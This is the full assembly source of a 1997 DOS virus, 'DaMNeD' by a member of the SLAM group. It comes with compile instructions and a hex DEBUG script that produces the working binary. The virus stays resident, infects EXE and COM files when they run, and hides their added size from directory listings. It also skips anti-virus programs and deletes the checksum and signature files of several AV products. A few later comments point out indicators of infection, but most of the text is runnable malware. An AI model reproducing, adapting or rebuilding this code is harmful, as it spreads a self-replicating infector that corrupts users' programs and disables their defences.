SLAM3.003: Resident semi-stealth EXE/COM infector ] DaMNeD [ by DC [SLAM]
] DaMNeD Virus [
This virus is a resident semi-stealth EXE/COM infector that infects, of course, on execute. However, it restores the time/date, kills some "bad" files, doesn't infect AVs, intercepts interrupt 24h, hides your size with DTA/FCB directory stealth, and works very well under Windows 95, but in MS-DOS windows neither directory stealth works :( I'm working on a Windows 95/DOS directory stealth...
To compile:
TASM /M DAMNED.ASM
TLINK DAMNED.OBJ
EXE2BIN DAMNED.OBJ DAMNED.COM
Delete other files:
DEL DAMNED.OBJ
DEL DAMNED.MAP
.
.model tiny
.code
jumps ; for long jumps
org 0
start: call get_delta ; get delta-offs
get_delta:
mov di,sp
mov ax,ss:[di]
mov bp,ax
sub bp,offset get_delta
push es ; save es
push ds ; save ds
mov ah,0bh ; residency check
mov bx,"SL" ;
mov cx,"AM" ; SLAM here?
int 21h
cmp ax,"OK" ; yepz
je return_file ; return from original file...
push es ; save es
mov ax,3521h ; get adress of interrupt 21
int 21h
mov word ptr cs:[i21][bp],bx ; save it
mov word ptr cs:[i21][bp][2],es
pop es ; restore es
mov ah,4ah ; routine to make resident
mov bx,-1
int 21h
sub bx,(v_size+15)/16+1
mov ah,4ah
int 21h
mov bx,(v_size+15)/16
nop
mov ah,48h
int 21h
mov es,ax
push es
pop ax
dec ax ; This routine is only for F-PROT
push ax ; cannot detect this virus a new
pop ds ; variant of CHILL! B)
xor di,di
mov ax,"Z"
mov word ptr ds:[di+0],ax
sub ax,"Z" ; AX="Z" sub AX,"Z" AX=0
add ax,0008 ; ADD AX,8 AX=8
mov word ptr ds:[di+1],ax ; Mark DOS Block
push cs ; CS=DS
pop ds
mov si,bp ; Si=OFFSET OF START
mov cx,v_size
rep movsb ; move virus
push es
pop ds
lea dx,int21 ; put resident!
mov ax,2125h
xchg ah,al
int 21h
return_file:
pop ds ; restore original
pop es ; DS and ES
cmp cs:[com_exe][bp],1 ; It's a COM or EXE file?
je return_exe ; If EXE jump to exe return
return_com:
lea si,saved_bytes+bp ; si = saved bytes
mov cx,200h
shr cx,2
shl cx,1
push cx
mov di,cx
mov cx,3
rep movsb ; move the bytes to CS:[100h]
pop cx
jmp cx ; return..
saved_bytes:
int 20h
nop
com_exe db ? ; com / exe ?
return_exe:
mov ax,es ; ax = PSP
add ax,10h ; ax = PSP+10h
add cs:[_cs+bp],ax ; save this address in CS:IP
cli
mov sp,word ptr cs:[_sp+bp] ; adjust SP
add ax,word ptr cs:[_ss+bp] ; adjust SS
mov ss,ax
sti
sub ax,ax ; zer0 regz!
sub dx,dx
xor bx,bx
sub cx,cx
xor di,di
sub si,si
db 0eah
_ip dw 00000h
_cs dw 00000h
_sp dw ?
_ss dw ?
int21:
pushf
xchg ah,al
cmp al,11h ; fcb find?
xchg ah,al
jz fcb_stealth
xchg ah,al
cmp al,12h ; fcb findnext?
xchg ah,al
jz fcb_stealth
cmp ah,4eh ; dta find?
jz dta_stealth
cmp ah,4fh ; dta findnext?
jz dta_stealth
push bx
mov bx,4b00h
cmp ax,bx ; execute?
pop bx
jz infect_file
cmp ah,0bh ; residency check?
jnz dos_1
cmp bx,"SL"
jnz dos_1
cmp cx,"AM"
jnz dos_1
mov ax,"OK" ; damned is here!
popf
iret
dos_1:
popf
dos:
db 0eah ; jmp to oldint21
i21 dd ?
ret
fcb_stealth:
push cs ; save code segment
call dos ; call int 21h
or al,al ; error?
jnz no_files ; yeah, return...
push ax bx es ; push some regs.
mov ah,51h ; get PSP
int 21h
mov es,bx
cmp bx,es:[16h] ; it's a good PSP?
jnz no_psp ; no??? return...
mov bx,dx
mov al,[bx] ; al = current drive
push ax
mov ah,2fh ; get DTA
int 21h
pop ax
inc al
jnz no_fix ; extended fcb?
add bx,7
no_fix:
mov al,byte ptr es:[bx+17h] ; get seconds field...
and al,1fh ; test for infection
cmp al,1dh ; infected?
jnz no_psp ; no? return...
hide_fsize:
sub word ptr es:[bx+1dh],v_size ; subtract v_size
; from filesize
no_psp:
pop es bx ax ; pop pushed regs...
no_files:
retf 2 ; return...
dta_stealth:
push cs ; save code segment
call dos ; call int 21h
jc no_files2 ; err? no files found
pushf ; save flags and
push ax bx es ; some regs.
mov ah,2fh ; get the DTA to es:bx
int 21h
mov ax,es:[bx+16h] ; get the time
and al,1fh ; unmask seconds
cmp al,1dh ; infected?
jnz not_inf ; no? return
hide: sub word ptr es:[bx+1ah],v_size ; subtract the vsize
; from filesize
not_inf:
pop es bx ax ; pop the pushed regs
popf ; restore flags...
no_files2:
retf 2
; --- Resident data area (copied to the TSR block together with the code) ---
i24 dd ? ; saved far pointer to the original INT 24h (critical-error) handler
buffer db 6 dup("SLAM") ; 24-byte (18h) scratch area: receives the first 18h bytes of the target file
f_size dd ? ; target file size as returned by the seek-to-EOF call (DX:AX)
f_name dd ? ; far pointer (seg:off) to the ASCIIZ path intercepted from INT 21h/AX=4B00h
time dw ? ; target's original file time (CX from INT 21h/AX=5700h); its seconds field is rewritten to 1Dh, which is the infection marker every stealth/infect check compares against
date dw ? ; target's original file date (DX from INT 21h/AX=5700h), written back unchanged
no_bad dw 8 ; number of entries in the 'bad' list below
file db 13 dup (0) ; staging copy of one 'bad' entry (8.3 name + NUL) for the delete call
; NUL-terminated names of integrity-checker / signature database files of
; contemporary DOS AV products (presumably TBAV, MSAV/CPAV, AVP, Dr Solomon's,
; McAfee, F-PROT — verify per product). The infect routine deletes each one.
; NOTE(review): the unexplained disappearance of these files, or executables
; whose timestamp seconds field equals 1Dh, is a usable host indicator.
bad db "ANTI-VIR.DAT",0 ; bad files...
db "CHKLIST.CPS",0
db "CHKLIST.MS",0
db "AVP.SET",0
db "FINDVIRU.DRV",0
db "AVP.OVL",0
db "SCAN.DAT",0
db "SIGN.DEF",0
infect_file:
push ax bx cx dx ds es di si ; push some regs...
mov word ptr cs:[f_name],dx ; save executed file
mov word ptr cs:[f_name][2],ds
call check_for_av ; check for av's...
jc exit_now ; don't infect...
mov ax,3524h ; get error handler.
int 21h
mov word ptr cs:[i24],bx ; save it
mov word ptr cs:[i24][2],es
mov ax,2425h ; put the new int24
push cs
pop ds
lea dx,error_handler
xchg al,ah
int 21h
mov dx,word ptr cs:[f_name] ; restore filename
mov ds,word ptr cs:[f_name][2]
mov ax,3D02h ; open it R/W acess
int 21h
mov bx,ax ; handle = AX = BX
push cs cs
pop es ds
mov ax,5700h ; get time
int 21h
mov word ptr cs:[time],cx
mov word ptr cs:[date],dx
and cl,1fh ; unmask secs.
cmp cl,1dh ; infected?!?!
je close_exit ; hmmm, next...
mov ax,3f00h ; read file...
lea dx,buffer
mov cx,18h ; 18h bytes (24 dec)
int 21h
mov ax,4202h ; go to -EOF-
mov cx,ax
sub cx,4202h
mov dx,cx
int 21h
mov word ptr cs:[f_size],ax ; save filesize
mov word ptr cs:[f_size][2],dx
mov cl,byte ptr buffer ; MZ signature check
add cl,byte ptr buffer+1
mov al,"M"
add al,"Z"
cmp al,cl
je infect_exe
mov ax,word ptr cs:[f_size] ; sub ax,3 ;)
sub ax,8
add ax,5
lea si,buffer ; save orig. bytes
lea di,saved_bytes
movsw
movsb
mov cl,0e9h ; cl = jump
mov byte ptr buffer,cl ; put the jmp
mov word ptr buffer+1,ax ; in the buffer
mov cs:[com_exe],0 ; mark! it's a com
mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h
mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,4200h
mov dx,cx
int 21h
mov ah,3fh ; write the header
lea dx,buffer ; (jump+large)
mov cx,3
inc ah ;
int 21h
close_exit:
mov ax,5700h ; write the new time
mov cx,word ptr cs:[time]
mov dx,word ptr cs:[date]
or cl,1dh
and cl,0fdh
inc al
int 21h
exit_close:
mov ax,3e00h ; close file
int 21h
lea si,bad ; bad files...
mov cx,cs:[no_bad] ; cx=number of files
ext:
lea di,file ; di=offset of file
fuck_av:
lodsb
cmp al,0
jz delete
stosb
jmp fuck_av
delete:
xor al,al
stosb
push cx
mov ax,4300h ; set attribs...
inc al
xor cx,cx
lea dx,file
int 21h
mov ah,41h ; delete bad file...
lea dx,file
int 21h
pop cx
loop ext
mov ax,2425h ; restore the new i24
mov dx,word ptr cs:[i24] ; handler
mov ds,word ptr cs:[i24][2]
xchg ah,al
int 21h
exit_now:
pop si di es ds dx cx bx ax
jmp dos_1
db 0
db "DaMNeD Virus (c) 1997, Dark Chakal [SLAM]"
db 0
infect_exe:
cmp word ptr buffer+18h,"@" ; it's a WiNEXE?
jz exit_close ; yepz!
cmp word ptr buffer+12h,"DC" ; second infection
jz exit_close ; marker...
mov ax,word ptr cs:[f_size] ; restore f_size
mov dx,word ptr cs:[f_size][2]
mov cx,word ptr [buffer+14h] ; save CS:IP
mov cs:[_ip],cx
mov cx,word ptr [buffer+16h]
mov cs:[_cs],cx
mov cx,word ptr [buffer+10h] ; save SS:SP
mov cs:[_sp],cx
mov cx,word ptr [buffer+0eh]
mov cs:[_ss],cx
mov cx,word ptr [buffer+8] ; convert header size
shl cx,4 ; to paragrafs...
sub ax,cx ; sub from filesize
sbb dx,0
mov cx,10h ; divide by paragrafs...
div cx
mov word ptr [buffer+14h],dx ; put the new IP
mov word ptr [buffer+16h],ax ; put the new CS
mov word ptr [buffer+12h],"DC" ; put the inf. mark.
; Dark Chakal ;)
mov ax,word ptr cs:[f_size] ; restore filesize
mov dx,word ptr cs:[f_size][2]
add ax,v_size ; ax=filesize+v_size
adc dx,0
mov cx,200h ; divide by pages
div cx
or dx,dx ; it's same page?
jz none ; yepz, no increment
inc ax
none:
mov word ptr [buffer+2],dx ; save it
mov word ptr [buffer+4],ax
mov cs:[com_exe],1 ; mark! it's a exe file
mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h
mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,ax
mov dx,cx
int 21h
mov ah,3fh ; write buffer (header)
lea dx,buffer
mov cx,18h
inc ah
int 21h
jmp close_exit
check_for_av:
mov si,dx
check_av:
lodsb
cmp al,"."
jnz check_av
lodsw
cmp ax,"XE"
jnz good
lodsb
cmp ax,"E"
jnz good
sub si,6
lodsw
cmp ax,"VA"
jz av_found
sub si,2
lodsw
cmp ax,"NA"
jz av_found
sub si,2
lodsw
cmp ax,"OT"
jz av_found
good: clc
ret
av_found:
stc
ret
error_handler:
mov al,3
iret
v_size equ $-start
end start
====That's for everyone without an assembler================================
N DAMNED.COM
E 0100 E8 00 00 8B FC 36 8B 05 8B E8 81 ED 03 00 06 1E
E 0110 B4 0B BB 4C 53 B9 4D 41 CD 21 3D 4B 4F 74 53 06
E 0120 B8 21 35 CD 21 2E 89 9E 04 01 2E 8C 86 06 01 07
E 0130 B4 4A BB FF FF CD 21 83 EB 46 B4 4A CD 21 BB 45
E 0140 00 90 B4 48 CD 21 8E C0 06 58 48 50 1F 33 FF B8
E 0150 5A 00 89 05 2D 5A 00 05 08 00 89 45 01 0E 1F 8B
E 0160 F5 B9 45 04 F3 A4 06 1F BA C5 00 B8 25 21 86 E0
E 0170 CD 21 1F 07 2E 80 BE 97 00 01 74 1C 8D B6 94 00
E 0180 B9 00 02 D1 E9 D1 E9 D1 E1 51 8B F9 B9 03 00 F3
E 0190 A4 59 FF E1 CD 20 90 00 8C C0 05 10 00 2E 01 86
E 01A0 BF 00 FA 2E 8B A6 C1 00 2E 03 86 C3 00 8E D0 FB
E 01B0 2B C0 2B D2 33 DB 2B C9 33 FF 2B F6 EA 00 00 00
E 01C0 00 00 00 00 00 9C 86 E0 3C 11 86 E0 74 3B 86 E0
E 01D0 3C 12 86 E0 74 33 80 FC 4E 74 6D 80 FC 4F 74 68
E 01E0 53 BB 00 4B 3B C3 5B 75 03 E9 0B 01 80 FC 0B 75
E 01F0 11 81 FB 4C 53 75 0B 81 F9 4D 41 75 05 B8 4B 4F
E 0200 9D CF 9D EA 00 00 00 00 C3 0E E8 F6 FF 0A C0 75
E 0210 34 50 53 06 B4 51 CD 21 8E C3 26 3B 1E 16 00 75
E 0220 21 8B DA 8A 07 50 B4 2F CD 21 58 FE C0 75 03 83
E 0230 C3 07 26 8A 47 17 24 1F 3C 1D 75 06 26 81 6F 1D
E 0240 45 04 07 5B 58 CA 02 00 0E E8 B7 FF 72 1C 9C 50
E 0250 53 06 B4 2F CD 21 26 8B 47 16 24 1F 3C 1D 75 06
E 0260 26 81 6F 1A 45 04 07 5B 58 9D CA 02 00 00 00 00
E 0270 00 53 4C 41 4D 53 4C 41 4D 53 4C 41 4D 53 4C 41
E 0280 4D 53 4C 41 4D 53 4C 41 4D 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 41 4E 54 49 2D 56 49 52 2E 44 41 54
E 02B0 00 43 48 4B 4C 49 53 54 2E 43 50 53 00 43 48 4B
E 02C0 4C 49 53 54 2E 4D 53 00 41 56 50 2E 53 45 54 00
E 02D0 46 49 4E 44 56 49 52 55 2E 44 52 56 00 41 56 50
E 02E0 2E 4F 56 4C 00 53 43 41 4E 2E 44 41 54 00 53 49
E 02F0 47 4E 2E 44 45 46 00 50 53 51 52 1E 06 57 56 2E
E 0300 89 16 8D 01 2E 8C 1E 8F 01 E8 04 02 73 03 E9 1B
E 0310 01 B8 24 35 CD 21 2E 89 1E 6D 01 2E 8C 06 6F 01
E 0320 B8 25 24 0E 1F BA 42 04 86 C4 CD 21 2E 8B 16 8D
E 0330 01 2E 8E 1E 8F 01 B8 02 3D CD 21 8B D8 0E 0E 07
E 0340 1F B8 00 57 CD 21 2E 89 0E 91 01 2E 89 16 93 01
E 0350 80 E1 1F 80 F9 1D 74 7A B8 00 3F BA 71 01 B9 18
E 0360 00 CD 21 B8 02 42 8B C8 81 E9 02 42 8B D1 CD 21
E 0370 2E A3 89 01 2E 89 16 8B 01 8A 0E 71 01 02 0E 72
E 0380 01 B0 4D 04 5A 3A C1 75 03 E9 D6 00 2E A1 89 01
E 0390 2D 08 00 05 05 00 BE 71 01 BF 94 00 A5 A4 B1 E9
E 03A0 88 0E 71 01 A3 72 01 2E C6 06 97 00 00 B4 3F BA
E 03B0 00 00 B9 45 04 FE C4 CD 21 B8 00 42 8B C8 81 E9
E 03C0 00 42 8B D1 CD 21 B4 3F BA 71 01 B9 03 00 FE C4
E 03D0 CD 21 B8 00 57 2E 8B 0E 91 01 2E 8B 16 93 01 80
E 03E0 C9 1D 80 E1 FD FE C0 CD 21 B8 00 3E CD 21 BE A4
E 03F0 01 2E 8B 0E 95 01 BF 97 01 AC 3C 00 74 03 AA EB
E 0400 F8 32 C0 AA 51 B8 00 43 FE C0 33 C9 BA 97 01 CD
E 0410 21 B4 41 BA 97 01 CD 21 59 E2 DB B8 25 24 2E 8B
E 0420 16 6D 01 2E 8E 1E 6F 01 86 E0 CD 21 5E 5F 07 1F
E 0430 5A 59 5B 58 E9 CB FD 00 44 61 4D 4E 65 44 20 56
E 0440 69 72 75 73 20 28 63 29 20 31 39 39 37 2C 20 44
E 0450 61 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D
E 0460 5D 00 83 3E 89 01 40 74 80 81 3E 83 01 43 44 75
E 0470 03 E9 75 FF 2E A1 89 01 2E 8B 16 8B 01 8B 0E 85
E 0480 01 2E 89 0E BD 00 8B 0E 87 01 2E 89 0E BF 00 8B
E 0490 0E 81 01 2E 89 0E C1 00 8B 0E 7F 01 2E 89 0E C3
E 04A0 00 8B 0E 79 01 D1 E1 D1 E1 D1 E1 D1 E1 2B C1 83
E 04B0 DA 00 B9 10 00 F7 F1 89 16 85 01 A3 87 01 C7 06
E 04C0 83 01 43 44 2E A1 89 01 2E 8B 16 8B 01 05 45 04
E 04D0 83 D2 00 B9 00 02 F7 F1 0B D2 74 01 40 89 16 73
E 04E0 01 A3 75 01 2E C6 06 97 00 01 B4 3F BA 00 00 B9
E 04F0 45 04 FE C4 CD 21 B8 00 42 8B C8 2B C8 8B D1 CD
E 0500 21 B4 3F BA 71 01 B9 18 00 FE C4 CD 21 E9 C2 FE
E 0510 8B F2 AC 3C 2E 75 FB AD 3D 45 58 75 21 AC 3D 45
E 0520 00 75 1B 83 EE 06 AD 3D 41 56 74 14 83 EE 02 AD
E 0530 3D 41 4E 74 0B 83 EE 02 AD 3D 54 4F 74 02 F8 C3
E 0540 F9 C3 B0 03 CF
RCX
0445
W
Q
===========================================================================